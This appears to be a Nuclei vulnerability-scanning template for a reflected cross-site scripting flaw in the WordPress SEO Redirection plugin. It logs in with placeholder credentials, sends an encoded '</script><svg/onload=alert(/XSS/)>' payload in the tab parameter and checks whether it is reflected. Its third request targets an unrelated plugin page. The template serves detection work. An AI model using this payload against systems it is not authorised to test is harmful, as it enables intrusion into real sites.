id: seo-redirection-xss

info:
  name: WordPress SEO Redirection <7.4 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    WordPress SEO Redirection 7.4 does not escape the tab parameter before outputting it back in JavaScript code, leading to a reflected cross-site scripting vulnerability.
  remediation: Fixed in version 7.4.
  reference:
    - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 3
  tags: wordpress,xss,wp-plugin,authenticated,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
      - |
        GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><svg/onload=alert(/XSS/)>"
          - "settings_page_seo-redirection"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202b3b1b24583f0985b0e60bee13b87acedf2a87d5a5874a29b09cfd521cec9110022100c4b0bd464699820c09bcad483b3d9907df90ec199bcd45430768af283a58c703:922c64590222798bb761d5b6d8e72950